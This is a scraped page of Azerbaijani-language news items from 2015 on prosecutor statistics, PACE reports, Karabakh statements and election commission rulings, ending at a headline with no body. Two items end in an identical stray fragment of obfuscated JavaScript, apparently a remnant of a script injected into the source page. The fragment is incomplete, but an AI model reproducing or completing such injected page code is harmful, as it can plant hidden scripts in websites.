Zakir Qaralov: “Prokurorluq orqanlarının 7 əməkdaşı işdən çıxarılıb”

94ea57c2-2297-4120-938f-813d264f0962_292

İcra və əmək intizamının tələblərini pozduqlarına və digər neqativ hallara yol verdiklərinə görə 66 əməkdaş intizam məsuliyyətinə cəlb edilib "Ötən ildən bu günə qədər prokurorluq orqanları üzrə 7 nəfər vəzifədən azad edilib". Faktinfo xəbər verir ki, bunu baş prokuror Zakir Qaralov deyib.O bildirib ki, 2014-cü il 1 oktyabr tarixdən indiyədək olan dövr ərzində prokurorluq orqanları üzrə icra və əmək intizamının tələblərini pozduqlarına və digər neqativ hallara yol verdiklərinə görə 66 əməkdaş intizam məsuliyyətinə cəlb edilib, onlardan 46 nəfərə şiddətli töhmət və töhmət elan edilib, 7 nəfər vəzifədən azad edilib, 3 nəfər xidmətlə bir araya sığmayan hərəkətlərə yol verdiklərinə görə prokurorluq orqanlarından xaric olunub: "İntizam məsuliyyətinə cəlb edilənlərin 8 nəfəri Baş Prokurorluğun, 6 nəfəri hərbi, 16 nəfəri Bakı şəhər prokurorluq orqanlarının, 12 nəfəri rayon prokuroru, 24 nəfəri isə respublika tabeliyində olan rayon prokurorluqlarının digər əməkdaşları olublar".Z.Qaralov qeyd edib ki, prokurorluq işçilərinin xidməti fəallığının artırılması istiqamətində zəruri tədbirlərin həyata keçirilməsi davam etdirilərək bu müddət ərzində prokurorluq orqanları üzrə 152 prokurorluq işçisi barəsində həvəsləndirmə tədbiri tətbiq olunub: "Onlardan 2 nəfər "Prokurorluğun fəxri işçisi" döş nişanı, 37 nəfər fəxri fərmanla təltif edilib, 23 nəfərə qiymətli hədiyyə, 6 nəfərə isə vaxtından əvvəl növbəti xüsusi rütbə verilib".

1 Oktyabr 2015 10:47

Baş prokuror: “Bu ilin 6 ayı ərzində korrupsiyaya görə 270 cinayət işi açılıb”

fa8a2808-4d50-4d3f-9820-e92130ebfd60_292

Zakir Qaralov: "Bu müddət ərzində 158 şəxs barəsində 99 cinayət işi baxılması üçün məhkəmələrə göndərilib "Bu ilin birinci yarımili ərzində Baş prokuror yanında Korrupsiyaya qarşı Mübarizə Baş İdarəsində 270 cinayət işinin ibtidai araşdırması həyata keçirilib". Faktinfo xəbər verir ki, bunu baş prokuror Zakir Qaralov bildirib. Onun sözlərinə görə, həmin cinayət işləri əsasən mənimsəmə və israfetmə, dələduzluq, vəzifə səlahiyyətlərindən sui-istifadə etmə, rüşvət alma (passiv rüşvətxorluq), vəzifəli şəxsin səlahiyyətlərini mənimsəmə, vəzifə saxtakarlığı, saxta sənədlərdən istifadə etmə və digər faktlarla əlaqədar olub. "Bu müddət ərzində 158 şəxs barəsində 99 cinayət işi baxılması üçün məhkəmələrə göndərilib". Baş prokuror deyib ki, korrupsiyaya qarşı mübarizə üzrə görülən sistemli və kompleks tədbirlər içərisində təşkilati və institusional islahatlar xüsusilə əhəmiyyətli olub. Z.Qaralov bildirib ki, "Korrupsiyaya qarşı mübarizəyə dair 2012-2015-ci illər üçün Milli Fəaliyyət Planı"nın 5.1-ci bəndinin icrası ilə əlaqədar olaraq Prezidentin 17 oktyabr 2014-cü il tarixli müvafiq fərmanları ilə "Daşınan əmlakın rəsmi reyestrləri, onların tərtib edilməsi və aparılması Qaydaları"na və "Azərbaycan Respublikası Dövlət Miqrasiya Xidmətinin vahid miqrasiya məlumat sistemi haqqında Əsasnamə"yə müvafiq dəyişiklik edilməklə Azərbaycanın Baş Prokuroru yanında Korrupsiyaya qarşı Mübarizə Baş İdarəsinə həmin reyestrlərin elektron məlumatlarından real vaxt rejimində istifadə etmək səlahiyyəti verilib ki, bu da korrupsiyaya qarşı mübarizə üzrə fəaliyyətin səmərəliliyinin artırılmasına şərait yaradıb. Onun sözlərinə görə, görülən ardıcıl və sistemli tədbirlər nəticəsində Baş prokuror yanında Korrupsiyaya qarşı Mübarizə Baş İdarəsinin fəaliyyətinin effektivliyi yüksəlməkdə davam edib: "2014-cü ildə Baş İdarədə 9145 ərizə və şikayətə baxılıb ki, onlardan 5951 müraciət qurumun "Qaynar xətt" əlaqə mərkəzinə daxil olub. Həmin müraciətlərin 21-i üzrə müvafiq əsaslar müəyyən olunduğundan Cinayət Məcəlləsinin müxtəlif maddələri üzrə cinayət işi başlanaraq istintaq aparılıb. Ümumilikdə, il ərzində Baş İdarə tərəfindən 326 cinayət xarakterli müraciət və məlumat araşdırılıb ki, onlardan da 98-i mənimsəmə, 85-i dələduzluq, 57-si vəzifədən sui-istifadə etmə, 27-si saxta sənəddən istifadə etmə, 25-i rüşvət, 4-ü qanunsuz kredit alma, 3-ü vergi ödəməkdən yayınma, 3-ü qanunsuz sahibkarlıq, 1-i qaçaqmalçılıq, 1-i kompüter sisteminə qanunsuz daxil olma, 22-si isə digər cinayətlərlə əlaqədar olub. İl ərzində Baş İdarənin Əməliyyat şöbəsi tərəfindən keçirilən 10 əməliyyat tədbiri nəticəsində korrupsiya cinayəti törədən 12 şəxs cinayət başında yaxalanıb. 12 nəfər barəsində 11 cinayət işi isə Əməliyyat şöbəsinin əməkdaşlarının apardığı araşdırma nəticəsində başlanıb. 2014-cü il ərzində Korrupsiyaya qarşı Mübarizə Baş İdarəsi tərəfindən 333 şəxs barəsində 206 cinayət işi baxılması üçün məhkəmələrə göndərilib, həmin işlərdən 171 iş maddi ziyanla əlaqədar olub ki, vurulan 76 milyon manatdan yuxarı ziyanın 72 faizinin istintaq zamanı ödənilməsi təmin edilib". Onun sözlərinə görə, 2015-cü ilin birinci yarımili ərzində Baş İdarədə 5150 ərizə və şikayətə baxılıb ki, onlardan 3414 müraciət qurumun "Qaynar xətt" əlaqə mərkəzinə daxil olub: "Həmin müraciətlərin 12-si üzrə Cinayət Məcəlləsinin müvafiq maddələri üzrə cinayət işi başlanaraq istintaq aparılıb. Cari ilin birinci yarımili ərzində Baş İdarə tərəfindən 95 cinayət xarakterli müraciət və məlumata baxılıb ki, onlardan da 14-ü rüşvət, 20-si vəzifədən sui-istifadə etmə, 30-u dələduzluq, 15-i mənimsəmə, 2-si saxta sənəddən istifadə etmə, 1-i saxta müflisləşmə, 3-ü qanunsuz sahibkarlıq, 1-i əmtəə nişanlarından qanunsuz istifadə, 5-i isə digər cinayətlərlə əlaqədar olub. Həmin müddət ərzində Baş İdarənin Əməliyyat şöbəsi tərəfindən keçirilən 10 əməliyyat tədbiri nəticəsində korrupsiya cinayəti törədən 10 şəxs cinayət başında yaxalanıb, 5 nəfər barəsində 5 cinayət işi isə Əməliyyat şöbəsinin əməkdaşlarının apardığı araşdırma nəticəsində başlanıb".

1 Oktyabr 2015 10:44

AŞ PA deputatın məruzəsini qəbul etdi

gfbfhyy

Avropa Şurası Parlament Assambleyasının (AŞ PA) payız plenar sessiyasının üçüncü iş günündə Azərbaycanın qurumdakı nümayəndə heyətinin üzvü Rafael Hüseynovun hazırladığı “Dini azadlıq və demokratik cəmiyyətdə birgə yaşama” adlı məruzəsi müzakirə olunaraq qəbul edilib Dini azadlığın demokratik cəmiyyətin təməl prinsiplərindən biri olduğunu bildirən avroparlamentarilər bu mövzuya dair məruzənin AŞ PA –da müzakirəsini önəmli sayıblar.Qeyd edilib ki, dini azadlıq İnsan Haqlarına dair Avropa Konvensiyasında da təsbit olunub. Dini azadlıq bir hüquqdur, amma o, digər hüquq və azadlıqların yerinə yetirilməsinə mane olmamalıdır. O, birgə yaşamanın əsas prinsiplərindən biridir.Məruzədə qeyd olunur ki, dövlətlər və dinlər demokratiki cəmiyyətlərin üzləşdiyi fanatizm və dini ekstremizm, ksenofobiya və fərqliliyin rədd edilməsi kimi problemlərə cavab olaraq, dialoqu və qarşılıqlı hörməti gücləndirmək üçün birgə səy göstərməlidirlər. “Birgə yaşamanın əsasını təşkil edən ümumi dəyər və prinsiplərin təşviqində dinlər əsas məsuliyyəti var. Təhsil mövhumata qarşı mübarizə aparmaq, stereotipləri dağıtmaq, etimad və qarşılıqlı hörmət yaratmaq və birgə yaşamanın ümumi dəyərlərinə qoşulmağı təşviq etməkdə üçün əsas elementdir. Məktəb də bu sahədə vacib rol oynaır. Bu kontekstdə, dövlətlər və dini icmalar qarşılıqlı eşitmə fürsəti və tənqidi düşüncənin inkişafı üçün əməkdaşlıq etməlidirlər. Avropa Şurası dini icmaların və digər təşkilatların yüksək rütbəli təmsilçiləri ilə sabir dialoq platforması yaratmalıdır...”- deyə məruzədə deyilir. R. Hüseynov çıxışında vurğulayıb ki, Azərbaycan dünyada tolerantlıq modellərindən biridir. Sonda məruzənin qətnamə və tövsiyə layihələri əlavə və dəyişiklərdən sonra səs qoyularaq qəbul olunub. Xatırladaq ki, Rafael Hüseynov indiyədək qurumun hüquqi məsələlər və insan hüquqları, mədəniyyət, elm, təhsil, habelə ətraf mühit, kənd təsərrüfatı, məhəlli və regional məsələlər komitələri çərçivəsində müxtəlif məruzələr hazırlayıb. (azvision.az)

1 Oktyabr 2015 9:19

Sərdar Cəlaloğludan Hafiz Hacıyevə cavab

fgtghh1

“Biz maraqlanmırıq o qalırmı, partiyası varmı” “Dünən bizim partiyanın siyası şurası yeni qərar qəbul etdi. Mən özüm səhhətimlə bağlı parlament seçkilərində namizəd kimi iştirak etməyəcəyəm”. Bunu hafta.az-a açıqlamasında Müasir Müsavat Partiyasının sədri Hafiz Hacıyev deyib. MMP sədri bildirib ki, buna baxmayaraq, partiyanın üzvlərinə sərbəstlik verilib: “Onlar sərbəst şəkildə parlament seçkilərinə namizədliklərini irəli sürə biləcəklər. Xaricdəyəm, amma mənə çatan məlumatlara görə, bölgə təşkilatımız da seçkilərə hazırlaşır. Özüm partiya sədri olaraq parlament seçkilərinə qatılmasam da, partiya demək olar ki, seçkilərə hazırlaşır”.Hafiz Hacıyev həmçinin vurğulayıb ki, o, Qərbin Azərbaycana qarşı apardığı qarayaxma kampaniyaları ilə bağlı göstəriş də verib: “Bununla bağlı onların cavablarını vermək üçün planlarımız var. İki-üç günə geri qayıdacağam. Ölkə rəhbərinin müdafiəsi ilə bağlı müəyyən ideoloji qrupların yaradılmasına köklənəcəyik. İşimizi prezidentin müdafiəsi ilə bağlı qurmağa çalışacağıq. Bizim üçün dövlətçilik hər şeydən üstündür. Biz dövlətimizə zərbə vuranların cavabsız qoyulmasına imkan verməyəcəyik. Prezidentin müdafiəsi üçün daxildən və xaricdən olan qüvvələrə qarşı mübarizə planı hazırlayırıq”.H.Hacıyev onu da deyib ki, rəhbərlik etdiyi təşkilatın bu seçkilərdə tək qalmış Azərbaycan Demokrat Partiyası (ADP) ilə birgə blok yaratması məsələsinin müzakirəyə çıxarılması istisna deyil: “Sərdar Cəlaloğlu ilə blok yaratmaq məsələsinə gəlincə, onu deyə bilərəm ki, bizim Sərdar bəylə çox yaxşı münasibətlərimiz var. Blok yaratmaqla bağlı onunla mənim aramda söhbət olmayıb. Lazım olsa, bu barədə söhbəti müzakirəyə çıxaracağıq”.ADP sədri Sərdar Cəlaloğlu isə “Yeni Müsavat”a açıqlamasında bildirdi ki, Hafiz Hacıyevlə heç bir münasibəti yoxdur. Münasibət yoxdursa, Hafiz Hacıyevin nədən “çox yaxşı münasibətimiz var” deməsi təəccüblüdür: “Şəxsən mən onu sonuncu dəfə 2013-cü ilin prezident seçkisində İctimai Televiziyada prezidentliyə namizədlər efirə çıxdığı zaman görmüşəm. O vaxtdan bu günə qədər onu görməmişəm. Bizim aramızda bu günə qədər hər hansı yaxın münasibət, əməkdaşlıq olmayıb. Müavinlərimiz arasında da hər hansı bir təmas olmayıb. Bizim partiyalarımız arasında əməkdaşlıqla bağlı da söhbət olmayıb və olması da gözlənilmir.Hafiz Hacıyev zaman-zaman mənim haqqımda, ADP haqqında ən ağır sözlər işlədib. İndi isə deyir ki, Sərdarla yaxşı münasibətim var. Mən Hafiz Hacıyevin zaman-zaman bizə qarşı işlətdiyi sözlərə cavab verməmişəm. Hafiz Hacıyevlə mənim aramda nə düşmənçilik münasibəti var, nə də dostluq, yaxınlıq. Heç bir təmasımız yoxdur. Biz maraqlanmırıq və məlumatımız da yoxdur ki, Hafiz Hacıyev qalırmı, onun partiyası varmı. Bizim Müasir Müsavat Partiyası ilə hər hansı münasibətimizin olması mümkün deyil.Biz tək qalmamışıq, bizi heç kəs təkləməyib, biz özümüz indiki mövqeyə çəkilmişik. Bizimlə əməkdaşlığa hazır olan xeyli qüvvələr var. Biz sadəcə olaraq indi əməkdaşlıq məsələsinə baxmırıq. Seçkilər bitsin, münasibətlər aydınlaşsın. Seçkidən sonrakı dövrdə əməkdaşlıq məsələsi gündəmə gələrsə, biz müəyyən qüvvələrlə əməkdaşlıq edəcəyik. O da həmin qüvvələr ola bilər ki, onlarla uzun illər bir cəbhədə olmuşuq, demokratik müxalifətdirlər. Hafiz Hacıyev isə həmin kateqoriyaya daxil olmadığı üçün bizim onunla müttəfiqliyimiz mümkün olmayan məsələdir”. (musavat.com)

1 Oktyabr 2015 9:09

​XİN rəhbəri: Sarqsyan Qarabağ münaqişəsi ilə bağlı bəzi faktları təhrif edib

7ab32f59-d1e6-4c50-b072-f9ad0f73c056_292

Hərbi işğal heç vaxt Ermənistanın gözlədiyi nəticələri verməyəcək Dağlıq Qarabağ regionu həmişə Azərbaycanın ayrılmaz hissəsi olub və belə də olacaq. Faktinfo  xəbər verir ki, bunu BMT Baş Assambleyasının 70-ci yubiley sessiyasının ümumsiyasi müzakirələri zamanı çıxış edən Azərbaycanın xarici işlər naziri Elmar Məmmədyarov bildirib. Onun sözlərinə görə, münaqişə yalnız Azərbaycanın suverenliyi və ərazi bütövlüyü əsasında ölkənin beynəlxalq səviyyədə tanınmış sərhədləri daxilində nizamlana bilər.Elmar Məmmədyarov qeyd edib ki, Azərbaycan torpaqlarının hərbi işğalı problemin həlli ola bilməz və heç vaxt Ermənistanın gözlədiyi siyasi nəticələri verməyəcək. O əlavə edib ki, Ermənistan prezidenti Serj Sarqsyan Baş Assambleyada çıxışı zamanı münaqişə ilə bağlı bəzi faktları təhrif edib.XİN rəhbəri əmin edib ki, Azərbaycan münaqişənin nizamlanması üzrə danışıqlarda uğurun əldə olunmasında hamıdan çox maraqlıdır. Onun fikrincə, region ölkələri və xalqları əməkdaşlıq və iqtisadi inkişaf imkanlarından yalnız mənfəət əldə edə bilərlər. Elmar Məmmədyarov sonda ölkəsi adından BMT-yə üzv ölkələrə Azərbaycan üçün mühüm olan məsələlər, xüsusilə də, onun suverenliyi və ərazi bütövlüyü ilə bağlı tutduqları prinsipial mövqeyə görə təşəkkür edib.

1 Oktyabr 2015 9:07

Barak Obamadan İlham Əliyevə məktub

888884

  Amerika Birləşmiş Ştatlarının Prezidenti Barak Obama Azərbaycan Prezidenti İlham Əliyevi Qurban bayramı münasibətilə təbrik edib Təbrikdə deyilir: "Hörmətli cənab Prezident, Amerika və dünya müsəlmanlarının Qurban bayramını qeyd etdiyi bir vaxtda Mişel və mən Sizə ən səmimi təbriklərimizi yetiririk. Biz vacib əməl olan Həcc ziyarətini uğurla başa vurmuş üç milyon müsəlman zəvvarla birgə minlərlə ABŞ vətəndaşını da təbrik edirik. Həcc ziyarəti müxtəlif mənşə və ənənələrə malik insanların ortaq bəşəri dəyərləri bölüşmək üçün bir araya gəlməsini nümayiş etdirir. Qurban bayramı həm sevinc və şənlik, həm də xeyriyyəçilik və mərhəmət, dua və dərin düşüncə bayramıdır. Birləşmiş Ştatlardan və dünyanın hər yerindən milyonlarla müsəlmanın İbrahim peyğəmbərin oğlunu qurban verməyə hazır olmasını yad etməklə ehtiyacı olanlara humanitar yardım göstərmələri məni ruhlandırır. Dünyada iztirabların heç biri Birma, Nigeriya, İraq və Suriyada münaqişədən qaçan, ağlasığmaz qəddarlıq və məhrumiyyətlərə düçar olan günahsız kişi, qadın və uşaqların üzləşdikləri qədər açıq-aşkar deyil. Biz bu durumda olan qonşularına qayğı göstərmək üçün əlindən gələni əsirgəməyən xalqları təqdir etməliyik. Bu cür mərhəmət əməlləri bütün məzhəblərdən olan insanların ortaq mənşə və dəyərlərini önə çəkir. Bu, mənim Prezident kimi tanış olduğum və dəyərləndirdiyim dünya ictimaiyyətinin əsl simasını - mərhəməti, müxtəlifliyi və əməkdaşlığı təcəssüm etdirir. Amerika xalqı adından dünyanın hər yerindəki müsəlman icmalarına Qurban bayramı təbriklərimizi çatdırırıq. Qurban bayramınız mübarək və Həcc ziyarətləriniz qəbul olsun".(azərtac)

30 Sentyabr 2015 3:50

Prezident İlham Əliyev cəbhə xəttində baş verən hadisələrə münasibət bildirib

fa13a09f-b204-48ce-888f-095250496648_292

Azərbaycan Prezidenti: "Ermənistan tərəfi Azərbaycanı təxribata çəkir Təmas xəttində baş verən hadisələrə toxunan Prezident İlham Əliyev Ermənistan tərəfinin Azərbaycanı təxribata çəkdiyini vurğulayıb. Belə halların Ermənistan tərəfinin taktikası olduğunu qeyd edən dövlət başçısı beynəlxalq vasitəçilərin də bu məsələyə tam ciddiliyi ilə yanaşmadıqlarını deyib. Dövlət başçısı qeyd edib ki, Ermənistan tərəfinin məqsədi danışıqlar prosesini uzatmaq və mövcud status-kvonu saxlamaqdan ibarətdir Azərbaycan Prezidenti İlham Əliyev sentyabrın 30-da Avropa İttifaqının Cənubi Qafqaz üzrə xüsusi nümayəndəsi Herbert Salberin başçılıq etdiyi nümayəndə heyətini qəbul edib. Faktinfo  xəbər verir ki, Herbert Salber səfərinin Avropa İttifaqı ilə Azərbaycan arasındakı əlaqələrin hazırkı mərhələsində bəzi məsələlərin və eləcə də regiondakı münaqişənin müzakirəsi üçün yaxşı imkan yaradacağını bildirib. Avropa İttifaqının Cənubi Qafqaz üzrə xüsusi nümayəndəsinin Azərbaycana son səfərindən ötən dövr ərzində regionda və eləcə də dünyada bir çox hadisələrin baş verdiyini qeyd edən dövlət başçısı bu məsələlərlə bağlı fikir mübadiləsi aparılmasının vacibliyini qeyd edib. Ermənistan-Azərbaycan, Dağlıq Qarabağ münaqişəsinə toxunan Prezident İlham Əliyev bildirib ki, münaqişənin həlli regional sabitlik üçün ən əhəmiyyətli amillərdən biridir. Dövlət başçısı qeyd edib ki, Ermənistan tərəfinin məqsədi danışıqlar prosesini uzatmaq və mövcud status-kvonu saxlamaqdan ibarətdir. Prezident İlham Əliyev status-kvonun uzun müddət davam etməsinin qəbuledilməz olduğunu və bu məsələnin ATƏT-in Minsk qrupunun həmsədr ölkələrinin prezidentləri tərəfindən də dəfələrlə bəyan edildiyini vurğulayıb. Təmas xəttində baş verən hadisələrə toxunan Prezident İlham Əliyev Ermənistan tərəfinin Azərbaycanı təxribata çəkdiyini vurğulayıb. Belə halların Ermənistan tərəfinin taktikası olduğunu qeyd edən dövlət başçısı beynəlxalq vasitəçilərin də bu məsələyə tam ciddiliyi ilə yanaşmadıqlarını deyib. Azərbaycan-Avropa İttifaqı əlaqələrinə toxunan Prezident İlham Əliyev Avropa İttifaqının bəzi dairələrinin ölkəmizlə bağlı qərəzli mövqeyinin yolverilməz olduğunu bildirib. Görüşdə Azərbaycan ilə Avropa İttifaqı arasında əməkdaşlığın hazırkı vəziyyəti və perspektivləri, Ermənistan-Azərbaycan, Dağlıq Qarabağ münaqişəsinin nizama salınması ilə bağlı məsələlər ətrafında fikir mübadiləsi aparılıb.

30 Sentyabr 2015 2:13

​Britaniyanın Kral Beynəlxalq Münasibətlər İnstitutunda Dağlıq Qarabağ münaqişəsi ilə bağlı tədbir keçirilib

0f9d4aba-85a2-42c2-a155-a4615b391388_292

Tədbirdə Londonda fəaliyyət göstərən diplomatik korpusun təmsilçiləri, beynəlxalq təşkilatların və şirkətlərin nümayəndələri iştirak ediblər Böyük Britaniyanın Kral Beynəlxalq Münasibətlər İnstitutu-“Chatham House”da “Dağlıq Qarabağ münaqişəsi ilə bağlı Azərbaycanın mövqeyi” mövzusunda tədbir keçirilib. Faktinfo xəbər verir ki, tədbirdə Londonda fəaliyyət göstərən diplomatik korpusun təmsilçiləri, beynəlxalq təşkilatların və şirkətlərin nümayəndələri, akademik dairələrin üzvləri, tədqiqatçılar, regiona maraq göstərən ekspertlər iştirak ediblər. “Azərbaycan Respublikası Dağlıq Qarabağ bölgəsinin azərbaycanlı icması” İctimai Birliyinin idarə heyətinin üzvü, Milli Məclisin deputatı Rövşən Rzayev, ADA Universitetində siyasi elmlər üzrə dosent Kavus Abuşov çıxış ediblər.R.Rzayev Ermənistan-Azərbaycan, Dağlıq Qarabağ münaqişəsinin mahiyyəti, başlanma səbəbi, hazırkı vəziyyəti, tərəflərin mövqeyi və problemin həlli yolları haqqında məlumat verib. Milli Məclisin deputatı beynəlxalq qurumları məsələyə daha ciddi yanaşmağa və münaqişənin tez bir zamanda həll edilməsi üçün daha böyük səylər göstrməyə çağırıb. Bildirilib ki, münaqişənin həllinə dair Azərbaycan hökumətinin mövqeyi beynəlxalq hüququn fundamental prinsiplərinə əsaslanır və Azərbaycanın ərazi bütövlüyünün qorunub saxlanılmasını nəzərdə tutur.K.Abuşov doğma torpaqlarımızın işğalçı ölkə tərəfindən zəbt edildiyini, bir milyondan artıq qaçqın və məcburi köçkünümüzün olduğunu diqqətə çatdıraraq deyib ki, dünyadakı digər münaqişə ocaqlarında olduğu kimi, Dağlıq Qarabağ münaqişəsinə də, Xocalı soyqırımı kimi faktlara da ciddi yanaşılmalı, Azərbaycanın ərazi bütövlüyü təmin edilməlidir.Sonda iştirakçıların sualları cavablandırılıb və müzakirələr aparılıb. İştirakçılar müzakirələrdə fəal iştirak ediblər və münaqişənin həllinə xüsusi maraq göstəriblər. Qeyd edək ki, iyul ayında Böyük Britaniyanın Kral Beynəlxalq Münasibətlər İnstitutu-“Chatham House” Dağlıq Qarabağın erməni separatçılarının rəhbəri Bako Saakyanı Londona dəvət etmişdi. Rəsmi Bakı separatşıların rəhbərinin Londona dəvət edilməsinə sərt reaksiya vermişdi.

30 Sentyabr 2015 11:15

Robert Valter Dağlıq Qarabağla bağlı hesabat hazırlayacaq

gtrrtrt

Avropa Şurası Parlament Assambleyasının (AŞPA) bu gün keçirilən plenar iclası çərçivəsində qurumun Demokratiya və siyasi məsələlər üzrə komitəsinin toplantısı keçirilib APA-nın Avropa müxbirinin məlumatına görə, toplantıda ingiltərəli deputat Robert Valterin Dağlıq Qarabağla bağlı şifahi hesabatı dinlənilib. Qərara alınıb ki, məruzəçi R. Valter Dağlıq Qarabağla bağlı hesabat hazırlasın. Qeyd edək ki, R. Valter AŞPA-nın Demokratiya və siyasi məsələlər üzrə komitəsi adından Dağlıq Qarabağa dair məruzə hazırlamaq üçün Azərbaycana səfər etsə də, Ermənistan hökuməti ona icazə vermədiyi üçün Ermənistan və Dağlıq Qarabağa səfərlər edə bilməyib. Erməni tərəfi məruzəçinin Dağlıq Qarabağla bağlı hesabat hazırlamasını istəmir. Komitənin iclasında iştirak etmiş Azərbaycanın AŞPA-dakı nümayəndə heyətinin rəhbəri Səməd Seyidov bildirib ki, Dağlıq Qarabağla bağlı hesabat hazırlanacaq: “Robert Valter Dağlıq Qarabağla bağlı məruzəsi ilə çıxış etdi və komitə Assambleyanın məruzəçisini ölkəyə buraxmamağı biabırçı bir addım kimi qiymətləndirdi. Erməni tərəfi müxtəlif bəhanələr gətirərək öz yalanlarını gizlətmək istəyirdi. Hansısa formada çalışırdılar ki, bu məsələni ört-basdır etsinlər, amma alınmadı. Nəinki alınmadı, erməni nümayəndə heyətinin üzvü Naqdalyanı ikinci dəfə komitədən qovdular. Mən də öz növbəmdə çıxış edərək bildirdim ki, burada söhbət Robert Valterdən getmir. Dağlıq Qarabağ üzrə alt komitə var idi, siz onu niyə ləğv etdiniz? AŞPA-nın sabiq sədri Jan-Klod Minyon mənimlə və Ermənistan nümayəndə heyətinin rəhbəri ilə azı 10 dəfə görüşmüşdü, niyə bunu rədd etdiniz? Deməli, məsələ Robert Valterdə deyil, Ermənistan sadəcə nələrisə gizlədir. Dedim ki, siz onu buraxmalıydınız, şərait yaratmalıydınız ki, o gizlədilən məsələlər üzə çıxsın. Yəni Dağlıq Qarabağla bağlı hesabat mütləq yazılacaq, Ermənistan məruzəçini ölkəyə buraxmasa belə. Robert Valterin mandatı bitənə qədər hesabat yazılacaq”. R. Valter isə Dağlıq Qarabağla bağlı hesabatı noyabr ayınadək yazıb AŞPA komitəsinə təqdim edəcəyinə ümidvar olduğunu bildirib. “AŞPA-nın siyasi məsələlər üzrə komitəsi hesabatı hazırlamağım üçün mənə dəstək verdi. Komitənin qərarına əsasən, mən həmçinin Ermənistana və Dağlıq Qarabağa səfərlər etməliydim, amma bu səfərləri gerçəkləşdirə bilmədiyim üçün çox üzgünəm. Ümid edirəm ki, komitəmizin dəstəyi ilə bu səfərləri də edə biləcəyəm. Hər halda hesabatı komitənin noyabr ayında keçiriləcək toplantısında təqdim edəcəyimə ümid edirəm”, - deyə o vurğulayıb. // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

29 Sentyabr 2015 10:01

Azərbaycanlı millət vəkili AŞPA məruzəçisi seçilib

ytutu7tui

Bu gün Avropa Şurası Parlament Assambleyasının (AŞPA) sessiyası çərçivəsində qurumun sosial məsələlər, sağlamlıq və daimi inkişaf komitəsinin toplantısı keçirilib APA-nın Avropa bürosunun məlumatına görə, komitədə gənclərin radikallaşmasının qarşısının alınması mövzusu üzrə məruzəçinin təyin edilməsi məsələsi müzakirə olunub və bu məsələni işləyib hazırlamaq üçün komitədən Assambleyanın iki parlamentarı seçilib. Onlardan biri İngiltərəli parlamentar Jeffri Donaldson, digəri isə Azərbaycanın Parlament Assambleyadakı nümayəndə heyətinin üzvü Sevinc Fətəliyeva olub. Sevinc Fətəliyeva bu məruzənin AŞPA-nın gələn ilin iyun ayında keçiriləcək sessiyasına hazır olacağını da bildirib. “Uşaqlar üzrə baş məruzəçi kimi bu məsələyə çox böyük marağım var idi və təbii ki, Azərbaycanda bu istiqamətdə təcrübə də kifayyət qədər çoxdur. Ona görə də bu mövzu üzrə məruzəçi olmaq arzusundaydım və səsvermə nəticəsində komitə məni həmməruzəçi qismində seçdi. İndi yəgin ki, qısa bir müddətdə bu hesabat hazırlanmalıdır. Çox guman ki, hesabat gələn ilin iyun ayına hazır olacaq və Assambleyaya təqdim ediləcək. Çünki bu mövzu gündəmdə olan və demək olar bütün Avropa ölkələrini əhatə edən məsələdir.  Xüsusilə də Yaxın Şərqdəki münaqişələri, ümimiyyətlə Avropadakı vəziyyəti nəzərə alaraq, hesab edirəm ki, bu çox faydalı bir iş olacaq”. // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

29 Sentyabr 2015 9:55

​MSK DSK-ların 4 qərarını qüvvədə saxlayıb

e8128529-2860-4134-b92e-622206cb2bd4_292

İcıasda Müsavat Partiyasının iki təmsilçisinin müraciətinə baxılıb Mərkəzi Seçki Komissiyasının (MSK) növbəti iclası keçirilib. Faktinfo-nun məlumatına görə, iclasda bu il noyabrın 1-nə təyin edilmiş parlament seçkiləri ilə əlaqədar MSK-ya daxil olmuş müraciətlərə baxılıb.MSK katibi Arifə Muxtarova deyib ki, 94 saylı Bərdə kənd seçki dairəsindən namizədliyini irəli sürmüş Müsavat Partiyasının üzvü Dadaş Əhmədli seçki dairəsinin qərarını mübahisələndirib. A.Muxtariva deyib ki, D.Əhmədlinin müraciəti Ekspert Qrupu araşdırıb. Məlum olub ki, onun təqdim etdiyi 550 imzadan 192-si etibarsız olub. İclasda DSK-nın Dadaş Əhmədlinin namizədliyini qeydə alınmaması ilə bağlı qərarı qüvvədə saxlanılıb. İclasda Müsavat Partiyasının Ağcabədi rayon təşkilatının sədri Rəşid Rəcəblinin müraciətinə də baxılıb. Belə ki, 82 saylı Ağcabədi seçki dairəsindən namizədliyini irəli sürən R.Rəcəbli dairə seçki komissiyasının qərarını mübahisələndirib. R.Rəcəbli müraciətində bildirib ki, DSK-ya təqdim edilən imza vərəqələrinin yoxlanılmasında onun iştirakı təmin edilməyib və əsassız olaraq namizədliyi qeydə alınmayıb. Ekspert Qrupunun araşdırması nəticəsində məlum olub ki, R.Rəcəbli DSK-ya 550 imza təqdim edib. Həmin imzalardan 224-nün sahibi bundan imtina edib. Onlar bildiriblər ki, imzalar aldadılma nəticəsində yığılıb. MSK R.Rəcəblinin şikayətini təmin etməyib və onun namizədliyi qeydə alınmayıb. MSK-nın iclasında iştirak edən R.Rəcəbli MSK-nın qərarına etirazını bildirib və deyilənlərin əssasız olduğunu qeyd edib. 61 Neftaçala seçki dairəsindən namizədliyini irəli sürmüş Kamran Əsədovun MSK-ya müraciəti də müzakirəyə çıxarılıb. Qərara alınıb ki, K.Əsədovun tələbi aydın olmadığından müraciət baxılmamış saxlanılsın. 74 saylı Lənkəran kənd seçki dairəsindən Tural Hüseynovun müraciətində qeyd edilib ki, müvafiq dairə seçki komissiyası əsassız olaraq onun namizədliyini qeydə almayıb. T.Hüseynov ona imza verənlərə təzyiq edildiyini bildirib. Ekspert Qrupunun araşdırması nəticəsində bəlli olub ki, imzalarını geri götürən şəxslərin imzaları istisna edilərsə, namizədliyin qeydə alınması üçün imzalar yetərli sayda deyil. Beləliklə, DSK-nın onunla bağlı verdiyi qərar qüvvədə saxlanılıb, T.Hüseynovun namizədliyi qeydə alınmayıb.

29 Sentyabr 2015 5:07

Azərbaycan MN: “Adları siyahıda göstərilən şəxslər ümumiyyətlə Silahlı Qüvvələrimizdə yoxdur”

a6054731-e191-49c8-9f38-74225ab403fe_292

